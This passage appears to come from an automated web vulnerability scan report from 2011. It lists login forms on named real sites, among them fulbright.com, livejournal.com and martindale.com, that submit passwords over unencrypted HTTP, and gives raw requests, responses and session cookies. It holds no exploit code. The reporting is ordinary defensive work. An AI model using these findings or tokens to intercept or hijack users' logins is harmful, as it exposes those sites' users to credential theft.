<form id="insitesearch" name="loginOptIn" action="/index.cfm?fuseaction=optin.actLogin&site_id=220" method="post">
<div class="clearfix">
...[SNIP]...
</label>
   <input name="loginPwd" id="password" type="password" onfocus="$(this).value='';" />
</p>
...[SNIP]...

7.37. http://www.fulbright.com/index.cfm

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fulbright.com
Path:   /index.cfm

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /index.cfm HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 17 Apr 2011 14:16:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=27740217;domain=.fulbright.com;expires=Tue, 09-Apr-2041 14:16:52 GMT;path=/
Set-Cookie: CFTOKEN=16144393;domain=.fulbright.com;expires=Tue, 09-Apr-2041 14:16:52 GMT;path=/
Set-Cookie: CFID=27740217;path=/
Set-Cookie: CFTOKEN=16144393;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <META HTT
...[SNIP]...
</p>

<form id="insitesearch" name="loginOptIn" action="/index.cfm?fuseaction=optin.actLogin&site_id=220" method="post">
<div class="clearfix">
...[SNIP]...
</label>
   <input name="loginPwd" id="password" type="password" onfocus="$(this).value='';" />
</p>
...[SNIP]...

7.38. http://www.fulbright.com/insite

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fulbright.com
Path:   /insite

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /insite HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 17 Apr 2011 14:16:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=27740252;domain=.fulbright.com;expires=Tue, 09-Apr-2041 14:16:58 GMT;path=/
Set-Cookie: CFTOKEN=33554824;domain=.fulbright.com;expires=Tue, 09-Apr-2041 14:16:58 GMT;path=/
Content-Type: text/html; charset=UTF-8

<html>
<head>
<title> The International Law Firm of Fulbright & Jaworski
- </title>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=UTF-8">
<link rel="stylesheet" href="/includes/
...[SNIP]...
<br />
   <form id="insitesearch" name="OptInRegister" action="/index.cfm?fuseaction=optin.actLogin&site_id=1199" method="post">
<label for="username">
...[SNIP]...
<br />
<input name="loginPwd" id="password" type="password" onfocus="$(this).value='';" />
<br />
...[SNIP]...

7.39. http://www.fulbright.com/insite

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fulbright.com
Path:   /insite

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /insite HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 17 Apr 2011 14:16:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=27740252;domain=.fulbright.com;expires=Tue, 09-Apr-2041 14:16:58 GMT;path=/
Set-Cookie: CFTOKEN=33554824;domain=.fulbright.com;expires=Tue, 09-Apr-2041 14:16:58 GMT;path=/
Content-Type: text/html; charset=UTF-8

<html>
<head>
<title> The International Law Firm of Fulbright & Jaworski
- </title>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=UTF-8">
<link rel="stylesheet" href="/includes/
...[SNIP]...
<br />
   <form id="loginOptIn" name="loginOptIn" action="/index.cfm?fuseaction=optin.actLogin&site_id=1199" method="post">

<label for="username">
...[SNIP]...
<br />
<input name="loginPwd" id="password" type="password" onfocus="$(this).value='';" />
<br />
...[SNIP]...

7.40. http://www.gabbr.com/login/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.gabbr.com
Path:   /login/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
The form contains the following password field:

Request

GET /login/ HTTP/1.1
Host: www.gabbr.com
Proxy-Connection: keep-alive
Referer: http://www.gabbr.com/submit'/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=0499a3333cddafe009316e3c383858cf

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 17:49:01 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 14150

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<div>
                                                                               <form action="http://www.gabbr.com/submit'/" method="post">
                                                                                       <p style="margin: 0px 10px 10px 10px;">
...[SNIP]...
<span style="margin-left: 20px;"><input name="userPassword" id="password" type="password" value="" size="9" maxlength="16"></span>
...[SNIP]...

7.41. http://www.gabbr.com/submit/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.gabbr.com
Path:   /submit/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
The form contains the following password field:

Request

GET /submit/ HTTP/1.1
Host: www.gabbr.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 14:14:53 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=91a88c0154fc07891ca43304c71faf53; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 16469

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
</p>
                       
       <form action="" method="post">

                   <div style="margin: 0px 10px 10px 10px;">
...[SNIP]...
</span><input name="userPassword" id="password" type="password" value="" size="12" maxlength="16" style="margin-left: 20px;" />
                   </div>
...[SNIP]...

7.42. http://www.gamekicker.com/node/add/drigg

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.gamekicker.com
Path:   /node/add/drigg

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
The form contains the following password field:

Request

GET /node/add/drigg HTTP/1.1
Host: www.gamekicker.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 403 Forbidden
Date: Sun, 17 Apr 2011 14:15:01 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.3.2
ETag: "3fa2f4d6be7822fc36b9c21709be4051"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Set-Cookie: SESS36e56acb22e80ac8af19585dda852f2a=0829a0d137b5364e4250e310b82a94d3; expires=Tue, 10-May-2011 17:48:22 GMT; path=/; domain=.gamekicker.com
Last-Modified: Sun, 17 Apr 2011 14:15:01 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 50520

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta http-equi
...[SNIP]...
<div class="content">
<form action="/node/add/drigg?destination=node%2Fadd%2Fdrigg" accept-charset="UTF-8" method="post" id="user-login-form">
<div>
...[SNIP]...
</label>
<input type="password" name="pass" id="edit-pass" maxlength="60" size="15" class="form-text required" />
</div>
...[SNIP]...

7.43. http://www.imera.com.br/post_d.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.imera.com.br
Path:   /post_d.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
The form contains the following password field:

Request

GET /post_d.html HTTP/1.1
Host: www.imera.com.br
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 14:20:51 GMT
Server: Apache/2.2.6 (Fedora)
Set-Cookie: JSESSIONID=9E310CDB5E7B8D27A297E4F959CA814D; Path=/
Cache-Control: no-store, max-age=0, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 6009


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html>
<head>
   <meta http-equiv="Content-Type" content=
...[SNIP]...
</div>
                                           <form name="loginForm" id="loginForm" action="post_login_a.html" method="post" class="p10">
                                               <input type="hidden" id="linkName" name="linkName" value="" />
...[SNIP]...
<br/>
                                               <input type="password" id="userPassword" name="userPassword" maxlength="20" style="width:70%;" /><br/>
...[SNIP]...

7.44. http://www.influx.com.br/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.influx.com.br
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.influx.com.br
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sun, 17 Apr 2011 14:21:45 GMT
Connection: close
Content-Length: 28572


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><meta http-equiv="Conte
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="default.aspx" onsubmit="javascript:return WebForm_OnSubmit();" id="aspnetForm">
<div>
...[SNIP]...
<p>
<input name ="Txt_pwd" value="senha" type="password" size="20" onclick="this.value=''" />
</p>
...[SNIP]...

7.45. http://www.jamespot.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.jamespot.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.jamespot.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 14:15:23 GMT
Server: Apache
X-Powered-By: PHP/5.2.4-2ubuntu5.7
Set-Cookie: PHPSESSID=7922bdfdabcd5d7e2f1216efae7f20b0; path=/
Expires: 2011-04-17 16:15:23
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 14696

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<div id="form">            
               <form action="http://www.jamespot.com/" method="post" name="forms_login">
                   <input type="hidden" name="action" value="login" />
...[SNIP]...
<input type="text" class="text" name="login" value="Email" onclick="if (this.value=='Email')this.value='';" />
                       <input type="password" class="text" value="nothing" onclick="this.value=''" name="password" />
                   </div>
...[SNIP]...

7.46. http://www.jumptags.com/add/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.jumptags.com
Path:   /add/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
The form contains the following password field:

Request

GET /add/ HTTP/1.1
Host: www.jumptags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Expires: Sunday 15-May-1994 12:00:00 GMT
Date: Sun, 17 Apr 2011 13:54:55 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=172837114;expires=Tue, 09-Apr-2041 13:54:55 GMT;path=/
Set-Cookie: CFTOKEN=38475879;expires=Tue, 09-Apr-2041 13:54:55 GMT;path=/
Set-Cookie: JSESSIONID=8430ea9775209f9393e0464f2d2c33571f3f;path=/
Content-Length: 2631


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- *** P
...[SNIP]...
<div id="dLoginBox">
<form action="/add/index.cfm" method="post" name="l" id="l">

<div class="content">
...[SNIP]...
</label>
   <input type="password" name="password" id="password">
   </div>
...[SNIP]...

7.47. http://www.librerio.com/inbox

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.librerio.com
Path:   /inbox

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
The form contains the following password field:

Request

GET /inbox HTTP/1.1
Host: www.librerio.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 14:14:16 GMT
Server: Apache
Set-Cookie: libreck=MIYaGCVIjMjDB4YGnWlPWRBUqmIYgM55%2By08WQ8JjnwwJnKNMt5iVXCOblLaRPLQ2yz%2BH6kzqMggqJoOmenJ91cEerOuO9XleVMbfe5kMuA1ViaRObbe6FvHlTvwBnfCiFyRAvn4S%2Fp7%2BI3%2FkZd3TCo92qc54zMyfPA4ABuWRt9%2FLmmSXwoRUmfpKD6RoAzwSVppzW3tkaV29%2FuPSEJCQuZjYc%2F14V92EEBrYII%2BUYP2qjRRGiWsBoSArSSBxHwnDRbBYUAWnp%2BaeaW51GtycNNkraTAaU%2B9ywn2CPPGNTVy53roRtFqquiOv3agv7wjqVJfY1WNClZNj%2FDl4TfCRqvUGNWHG%2FisVe11%2BWqAEb9zveNIF%2FsF0%2BypIdCVvW69CR4mJSHR1nfliIXDEZ6huw34sL8UvdVHNSI4IKW6CexMrcu9jgNpZU1R4KgPFe%2FL7hyE1LOHn74v0HFTTOD2wn4iA4HtHr6m4040ENJJbqufVv5WwztygNmK4Z4eemvXdG26v1X%2B%2FnEG52R90wK2qvjGgKI8gNMy1I0QLMoqIwWtJ42%2B4miSmAtTHM5NYfb%2FwEua83%2B3seZY3LQme6fEwAenBnfLiX%2FK9xJhjsN1g%2BDf6b%2BJv4rWjhgDUR9kwL3M; expires=Fri, 22-Apr-2011 14:14:17 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 3684

<html>
<head><title> Save to Inbox </title>
<link rel="shortcut icon" href="/favicon.ico">
<link rel="icon" href="/favicon.ico" type="image/x-icon">
<link rel='stylesheet' href='/css/pgview.css' t
...[SNIP]...
<hr>
   <form action="http://www.librerio.com/inbox" method="post">    <table>
...[SNIP]...
</b>&nbsp;<input type='password' name='loginpw' size='20' maxlength='20' value=''><p>
...[SNIP]...

7.48. http://www.linkagogo.com/go/AddNoPopup

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.linkagogo.com
Path:   /go/AddNoPopup

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
The form contains the following password field:

Request

GET /go/AddNoPopup HTTP/1.1
Host: www.linkagogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 14:14:13 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8b Resin/3.1.4
ETag: "AAAAS9jz87w"
Last-Modified: Sun, 17 Apr 2011 14:14:14 GMT
Cache-Control: no-cache
Expires: 0
Set-Cookie: cookies=Y; path=/
Set-Cookie: user=-1; path=/; expires=Sat, 07-Apr-2012 14:14:13 GMT
Set-Cookie: userName=guest; path=/; expires=Sat, 07-Apr-2012 14:14:13 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Content-Length: 17084

<html lang="eng-US">
<head>
<link rel="search" type="application/opensearchdescription+xml" href="/addons/linkagogo_search.xml" title="linkaGoGo favorites search" />
<link rel="search" type="applicati
...[SNIP]...
</table>
<form name=urlEdit method="post" action="/go/AddNoPopup">
<input type="hidden" name="target" value="null">
...[SNIP]...
<td>
<input type="password" name="password" value="" size="8">
</td>
...[SNIP]...

7.49. http://www.livejournal.com/update.bml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.livejournal.com
Path:   /update.bml

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
The form contains the following password field:

Request

GET /update.bml HTTP/1.1
Host: www.livejournal.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: GoatProxy 1.0
Date: Sun, 17 Apr 2011 14:14:18 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-AWS-Id: ws34
Set-Cookie: ljuniq=b5UUqFDJWUNNLQN:1303049658:pgstats0:m0; expires=Thursday, 16-Jun-2011 14:14:18 GMT; domain=.livejournal.com; path=/
X-XSS-Protection: 0
X-Frame-Options: deny
Cache-Control: private, proxy-revalidate
ETag: "194009227f3a4d23657df148b580d6ac"
Content-Language: en
Content-Length: 49639
X-Varnish: 1706190852
Age: 0
Via: 1.1 varnish

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<
...[SNIP]...
<td>

<form method='post' action='update.bml' id='updateForm' name='updateForm'>

<input type='hidden' name="lj_form_auth" value="c0:1303048800:858:86400:SYlILbpB7Q-0-b5UUqFDJWUNNLQN:02df13cf1d18f92cb5825c659e884be3" />
...[SNIP]...
</label>
<input type="password" maxlength="30" tabindex="6" name="password" class="text" id="altlogin_password" size="15" />
</p>
...[SNIP]...

7.50. http://www.longislanderotic.com/longislanderotic/forum/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.longislanderotic.com
Path:   /longislanderotic/forum/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
The form contains the following password field:

Request

GET /longislanderotic/forum/ HTTP/1.1
Host: www.longislanderotic.com
Proxy-Connection: keep-alive
Referer: http://www.longislanderotic.com/landing.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 12:44:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
pragma: no-cache
cache-control: private
Content-Length: 21036
Content-Type: text/html
Expires: Fri, 15 Apr 2011 12:44:32 GMT
Set-Cookie: WWF=LV=2011%2D04%2D17+05%3A44%3A32&SID=3f7ef8f78126585da9396zfdab5296d4; expires=Tue, 17-Apr-2012 12:44:32 GMT; path=/longislanderotic
Set-Cookie: ASPSESSIONIDQSBBADSQ=OFDDCGFBOBAANIHGHJNBKAIJ; path=/
Cache-control: No-Store


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en">
<head>
<m
...[SNIP]...
<td align="right" class="smText">
<form method="post" name="frmLogin" id="frmLogin" action="login_user.asp">Quick Login
<input type="text" size="10" name="name" id="name" style="font-size: 10px;" />
<input type="password" size="10" name="password" id="password" style="font-size: 10px;" />
<input type="hidden" name="NS" id="NS" value="1" />
...[SNIP]...

7.51. http://www.longislanderotic.com/longislanderotic/forum/default.asp

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.longislanderotic.com
Path:   /longislanderotic/forum/default.asp

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
The form contains the following password field:

Request

GET /longislanderotic/forum/default.asp HTTP/1.1
Host: www.longislanderotic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASPSESSIONIDQSBBADSQ=NFDDCGFBPBNGBOOILNHIBEPM; __utmz=231616898.1303044274.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); WWF=LV=2011%2D04%2D17+05%3A44%3A32&SID=3128zc3fd887z6ef12cafc4a7azdcf6e; __utma=231616898.1868230739.1303044274.1303044274.1303044274.1; __utmc=231616898; __utmb=231616898;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 17 Apr 2011 14:14:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
pragma: no-cache
cache-control: private
Content-Length: 21757
Content-Type: text/html
Expires: Fri, 15 Apr 2011 14:14:20 GMT
Set-Cookie: WWF=LV=2011%2D04%2D17+07%3A14%3A21&SID=9e6cb951e3575fea424357ca8339d43a; expires=Tue, 17-Apr-2012 14:14:20 GMT; path=/longislanderotic
Cache-control: No-Store


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en">
<head>
<m
...[SNIP]...
<td align="right" class="smText">
<form method="post" name="frmLogin" id="frmLogin" action="login_user.asp">Quick Login
<input type="text" size="10" name="name" id="name" style="font-size: 10px;" />
<input type="password" size="10" name="password" id="password" style="font-size: 10px;" />
<input type="hidden" name="NS" id="NS" value="1" />
...[SNIP]...

7.52. http://www.longislanderotic.com/longislanderotic/forum/insufficient_permission.asp

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.longislanderotic.com
Path:   /longislanderotic/forum/insufficient_permission.asp

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
The form contains the following password field:

Request

GET /longislanderotic/forum/insufficient_permission.asp HTTP/1.1
Host: www.longislanderotic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WWF=LV=2011%2D04%2D17+05%3A44%3A32&SID=3128zc3fd887z6ef12cafc4a7azdcf6e; ASPSESSIONIDQSBBADSQ=NFDDCGFBPBNGBOOILNHIBEPM; __utma=231616898.1868230739.1303044274.1303044274.1303044274.1; __utmb=231616898; __utmc=231616898; __utmz=231616898.1303044274.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 12:44:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
pragma: no-cache
cache-control: private
Content-Length: 9058
Content-Type: text/html
Expires: Fri, 15 Apr 2011 12:44:38 GMT
Cache-control: No-Store


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en">
<head>
<m
...[SNIP]...
<div id="progressFormArea">
<form method="post" name="frmLogin" id="frmLogin" action="login_user.asp?FID=0" onSubmit="return CheckForm();" onReset="return confirm('Are you sure you want to reset the form?');">
<table cellspacing="1" cellpadding="3" class="tableBorder" align="center">
...[SNIP]...
<td><input type="password" name="password" id="password" size="15" maxlength="15" value="" /> <a href="javascript:winOpener('forgotten_password.asp','forgot_pass',0,1,570,350)">
...[SNIP]...

7.53. http://www.longislanderotic.com/longislanderotic/forum/login_user.asp

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.longislanderotic.com
Path:   /longislanderotic/forum/login_user.asp

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
The form contains the following password field:

Request

GET /longislanderotic/forum/login_user.asp HTTP/1.1
Host: www.longislanderotic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASPSESSIONIDQSBBADSQ=NFDDCGFBPBNGBOOILNHIBEPM; __utmz=231616898.1303044274.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); WWF=LV=2011%2D04%2D17+05%3A44%3A32&SID=3128zc3fd887z6ef12cafc4a7azdcf6e; __utma=231616898.1868230739.1303044274.1303044274.1303044274.1; __utmc=231616898; __utmb=231616898;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 17 Apr 2011 14:14:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
pragma: no-cache
cache-control: private
Content-Length: 9865
Content-Type: text/html
Expires: Fri, 15 Apr 2011 14:14:20 GMT
Set-Cookie: WWF=LV=2011%2D04%2D17+07%3A14%3A21&SID=ae36256bb374f6929c3dca61e7b6zz63; expires=Tue, 17-Apr-2012 14:14:20 GMT; path=/longislanderotic
Cache-control: No-Store


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en">
<head>
<m
...[SNIP]...
<div id="progressFormArea">
<form method="post" name="frmLogin" id="frmLogin" action="login_user.asp?FID=0" onSubmit="return CheckForm();" onReset="return confirm('Are you sure you want to reset the form?');">
<table cellspacing="1" cellpadding="3" class="tableBorder" align="center">
...[SNIP]...
<td><input type="password" name="password" id="password" size="15" maxlength="15" value="" /> <a href="javascript:winOpener('forgotten_password.asp','forgot_pass',0,1,570,350)">
...[SNIP]...

7.54. http://www.martindale.com/ContactUs.aspx

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.martindale.com
Path:   /ContactUs.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
The form contains the following password field:

Request

GET /ContactUs.aspx HTTP/1.1
Host: www.martindale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: op397mdcsearchresultsliid=a00y02z086274fm0zw4ywe274gi0dv3yy7ea4; __utmz=205508303.1302905514.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); MH_survey_MDC64=0; mdc_session_id=e42928a5acac4e6598b36e4172c30143; browser_id=4536f10003b84d77a65f457425f341af; CSStatsCookie=BrowserId=4536f10003b84d77a65f457425f341af&SessionId=e42928a5acac4e6598b36e4172c30143&ReferringDomain=www.martindale.com&ProviderId=LL2&SearchId=&InitialSearchId=; refDomain=www.martindale.com; WT_FPC=id=173.193.214.243-1374343632.30143633:lv=1302961739374:ss=1302961642795; op397mdcsearchresultsgum=a00y02z086274fm0zw4ywe274gi0dv3yy7ea4; __utma=205508303.24449278.1302905514.1302912242.1302961643.3; __utmc=205508303; ASP.NET_SessionId=l5lymsy25kgocbinie2xhi2d; __utmb=205508303.2.10.1302961643;

Response

HTTP/1.1 200 OK
Date: Sat, 16 Apr 2011 13:54:56 GMT
Server: www.martindale.com 9999
X-Powered-By: ASP.NET
